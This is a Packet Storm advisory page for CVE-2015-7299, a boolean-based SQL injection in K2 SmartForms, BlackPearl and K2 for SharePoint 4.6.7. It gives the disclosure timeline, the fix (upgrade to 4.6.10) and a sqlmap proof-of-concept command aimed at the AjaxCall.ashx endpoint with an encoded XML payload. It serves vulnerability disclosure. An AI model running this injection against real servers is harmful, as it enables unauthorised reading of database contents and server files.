exploit the possibilities

K2 SmartForms / BlackPearl SQL Injection

K2 SmartForms / BlackPearl SQL Injection
Posted Oct 13, 2015
Authored by Wissam Bashour

K2 SmartForms, BlackPearl, and K2 for Sharepoint version 4.6.7 suffer from a boolean-based remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2015-7299
MD5 | 28f5a7664e1c5968728cfb7f6bdc1010

K2 SmartForms / BlackPearl SQL Injection

Change Mirror Download
Title: Boolean-based SQL injection Vulnerability in K2 Platforms.
Author: Wissam Bashour - Help AG Middle East
Vendor: K2
Product: SmartForms, BlackPearl, K2 for sharepoint
Version: 4.6.7
Tested Version: Version 4.6.7
Severity: HIGH
CVE Reference: CVE-2015-7299

# About the Product: K2 smartforms can pull and push information from line-of-business systems — SharePoint, CRM, SAP and others — and they can be used in the cloud with applications like Salesforce.com. The built-in K2 SmartObject technology allows true reusability of SmartForms components across multiple SmartForms, in multiple applications.


# Description:
This Boolean-based SQL injection vulnerability enables an anonymous attacker to read sensitive data from the database, and recover the content of a given file present on the DBMS file system.

# Vulnerability Class:
SQL injection - https://www.owasp.org/index.php/SQL_Injection)

# How to Reproduce: (POC):
Host the attached code in a webserver. Then go for the xml parameter that calls the AJAXCall.ashx in the smart object for the SharePoint.
You can see that the parameter doesn’t sanitize SQL queries.

# Disclosure:
Discovered: September 20, 2015
Vendor Notification: September 22, 2015
Advisory Publication: October 13, 2015
Public Disclosure: October 15, 2015

# Solution:
Upgrade to 4.6.10 or later will fix this issue.
The new version number is 4.6.10 (4.12060.1690.2)
Release date: June, 2015


# credits:
Wissam Bashour
Associate Security Analyst
Help AG Middle East

# Proof of Concept Code:
https://raw.githubusercontent.com/Siros96/Boolean-SQL-injection/master/PoC

# Boolean-SQL-injection
# this is the sqlmap code
sqlmap --url="http://eforms.####/Runtime/Runtime/AjaxCall.ashx" --data="xml=%253Cbrokerpackage%253E%253Csmartobject%2520guid%253D%25227986fc5b-633a-44bb-9a90-ed1c4f4c0bc3%2522%2520resultname%253D%2522Association_41f4b785-0bc3-0ef6-2d81-25509c13c3bd_7986fc5b-633a-44bb-9a90-ed1c4f4c0bc3%2522%253E%253Cmethod%2520name%253D%2522List%2522%253E%253CSorters%253E%253CSorter%2520OrderBy%253D%2522FirstName%2522%2520OrderByResultName%253D%2522Association_41f4b785-0bc3-0ef6-2d81-25509c13c3bd_7986fc5b-633a-44bb-9a90-ed1c4f4c0bc3%2522%2520Direction%253D%2522ascending%2522%252F%253E%253C%252FSorters%253E%253Cfilter%253E%253CFilter%253E%253COr%253E%253CContains%253E%253CItem%2520SourceType%253D%2522ObjectProperty%2522%2520SourceID%253D%2522Association_41f4b785-0bc3-0ef6-2d81-25509c13c3bd_7986fc5b-633a-44bb-9a90-ed1c4f4c0bc3.FirstName%2522%2520DataType%253D%2522Text%2522%253EFirstName%253C%252FItem%253E%253CItem%2520SourceType%253D%2522Value%2522%253E%253CSourceValue%253E*%253C%252FSourceValue%253E%253C%252FItem%253E%253C%252FContains%253E%253CContains%253E%253CItem%2520SourceType%253D%2522ObjectProperty%2522%2520SourceID%253D%2522Association_41f4b785-0bc3-0ef6-2d81-25509c13c3bd_7986fc5b-633a-44bb-9a90-ed1c4f4c0bc3.LastName%2522%2520DataType%253D%2522Text%2522%253ELastName%253C%252FItem%253E%253CItem%2520SourceType%253D%2522Value%2522%253E%253CSourceValue%253E*%253C%252FSourceValue%253E%253C%252FItem%253E%253C%252FContains%253E%253C%252FOr%253E%253C%252FFilter%253E%253C%252Ffilter%253E%253C%252Fmethod%253E%253Cparameter%2520name%253D%2522jobtitleid%2522%253E%253CSourceValue%253E%253C!%255BCDATA%255Bscnull%255D%255D%253E%253C%252FSourceValue%253E%253C%252Fparameter%253E%253Cparameter%2520name%253D%2522departmentid%2522%253E%253CSourceValue%253E%253C!%255BCDATA%255Bscnull%255D%255D%253E%253C%252FSourceValue%253E%253C%252Fparameter%253E%253Cparameter%2520name%253D%2522divisionid%2522%253E%253CSourceValue%253E%253C!%255BCDATA%255Bscnull%255D%255D%253E%253C%252FSourceValue%253E%253C%252Fparameter%253E%253Cparameter%2520name%253D%2522employeeid_1%2522%253E%253CSourceValue%253E%253C!%255BCDATA%255Bscnull%255D%255D%253E%253C%252FSourceValue%253E%253C%252Fparameter%253E%253Cresults%253E%253CResult%2520SourceType%253D%2522Result%2522%2520SourceID%253D%25227986fc5b-633a-44bb-9a90-ed1c4f4c0bc3%2522%2520SourceInstanceID%253D%2522db445b19-c6b2-146a-6e30-9096a4cfd3ea%2522%2520TargetType%253D%2522Control%2522%2520TargetID%253D%2522db445b19-c6b2-146a-6e30-9096a4cfd3ea_41f4b785-0bc3-0ef6-2d81-25509c13c3bd%2522%2520TargetInstanceID%253D%2522db445b19-c6b2-146a-6e30-9096a4cfd3ea%2522%252F%253E%253C%252Fresults%253E%253C%252Fsmartobject%253E%253Cmetadata%253E%253Cid%253E9e06faa7-1d6b-48b9-960b-cd7e64c4b7d5%253C%252Fid%253E%253Cmethodexecuted%253EList%253C%252Fmethodexecuted%253E%253Ctypeofview%253ECapture%253C%252Ftypeofview%253E%253Cidofcontrol%253Edb445b19-c6b2-146a-6e30-9096a4cfd3ea_41f4b785-0bc3-0ef6-2d81-25509c13c3bd%253C%252Fidofcontrol%253E%253Cinstanceid%253Edb445b19-c6b2-146a-6e30-9096a4cfd3ea%253C%252Finstanceid%253E%253Cpagenumber%253E1%253C%252Fpagenumber%253E%253Cpagesize%253E10%253C%252Fpagesize%253E%253Cfieldbehaviorignoreresults%253Etrue%253C%252Ffieldbehaviorignoreresults%253E%253C%252Fmetadata%253E%253C%252Fbrokerpackage%253E" --auth-type=NTLM --auth-cred=###### --dbms="mssql"



#References:
[1] help AG middle East http://www.helpag.com/.
[2] http://www.k2.com/
[3] https://www.owasp.org/index.php/SQL_Injection
[4] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close